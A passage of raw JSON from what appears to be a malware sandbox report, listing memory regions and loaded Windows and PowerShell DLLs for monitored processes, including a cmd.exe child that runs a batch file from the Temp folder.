], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32247807, "entry_point": 0, "filename": null, "id": "region_655", "name": "pagefile_0x0000000001ec0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32243712, "timestamp": "00:00:49.602", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000656-addr_0x000000001b830000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 461570048, "type": "region", "version": 1 }, "end_va": 462618623, "entry_point": 0, "filename": null, "id": "region_656", "name": "private_0x000000001b830000", "norm_filename": null, "region_type": "private_memory", "start_va": 461570048, "timestamp": "00:00:49.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820647936, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_657", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:00:49.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791334060032, "type": "region", "version": 1 }, "end_va": 8791334313983, "entry_point": 8791334060032, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_658", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791334060032, "timestamp": "00:00:49.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791334322176, "type": "region", "version": 1 }, "end_va": 8791335469055, "entry_point": 8791334322176, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_659", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791334322176, "timestamp": "00:00:49.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791335501824, "type": "region", "version": 1 }, "end_va": 8791337689087, "entry_point": 8791335501824, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_660", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791335501824, "timestamp": "00:00:49.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 457572352, "type": "region", "version": 1 }, "end_va": 457916415, "entry_point": 457572352, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_661", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 457572352, "timestamp": "00:00:52.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791323836416, "type": "region", "version": 1 }, "end_va": 8791325495295, "entry_point": 8791323836416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_662", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791323836416, "timestamp": "00:00:52.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791325540352, "type": "region", "version": 1 }, "end_va": 8791327031295, "entry_point": 8791325540352, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_663", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791325540352, "timestamp": "00:00:52.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791327047680, "type": "region", "version": 1 }, "end_va": 8791334014975, "entry_point": 8791327047680, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_664", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791327047680, "timestamp": "00:00:52.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791624384512, "type": "region", "version": 1 }, "end_va": 8791624413183, "entry_point": 8791624384512, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_665", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791624384512, "timestamp": "00:00:52.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32313343, "entry_point": 0, "filename": null, "id": "region_666", "name": "pagefile_0x0000000001ec0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32243712, "timestamp": "00:00:54.381", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd /c \"\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat\" \"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_4", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000708-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_708", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:01.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_709", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:01.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_710", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:01.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000711-addr_0x00000000001d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_711", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:01.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 364544, "start_va": 1239875584, "type": "region", "version": 1 }, "end_va": 1240240127, "entry_point": 1239912628, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_712", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239875584, "timestamp": "00:01:01.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_713", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:01:01.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_714", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:01.356", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000715-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_715", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:01.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_716", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:01:01.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_717", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:01.358", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000718-addr_0x000007fffffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_718", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:01.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000719-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_719", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:01.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_720", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:01.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_721", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:01.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_722", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:01.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_723", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:01.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_724", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:01.409", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000725-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_725", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:01.409", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000726-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_726", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:01.409", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000727-addr_0x00000000001b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_727", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:01.410", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000728-addr_0x00000000002d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_728", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:01.410", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000729-addr_0x0000000000470000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_729", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:01.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 7307263, "entry_point": 0, "filename": null, "id": "region_730", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:01.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 8916991, "entry_point": 0, "filename": null, "id": "region_731", "name": "pagefile_0x0000000000700000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7340032, "timestamp": "00:01:01.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_732", "name": "pagefile_0x0000000000890000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8978432, "timestamp": "00:01:01.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 33370111, "entry_point": 0, "filename": null, "id": "region_733", "name": "pagefile_0x0000000001c90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29949952, "timestamp": "00:01:01.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_734", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:01:01.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_735", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:01:01.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_736", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:01.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_737", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:01.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791624318976, "type": "region", "version": 1 }, "end_va": 8791624351743, "entry_point": 8791624323488, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_738", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 8791624318976, "timestamp": "00:01:01.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_739", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:01:01.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_740", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:01:01.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_741", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:01:01.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_742", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:01:01.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_743", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:01:01.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_744", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:01:01.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_745", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:01:01.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_746", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:01:01.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_747", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:01:01.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_748", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:01:01.448", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000749-addr_0x0000000000100000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 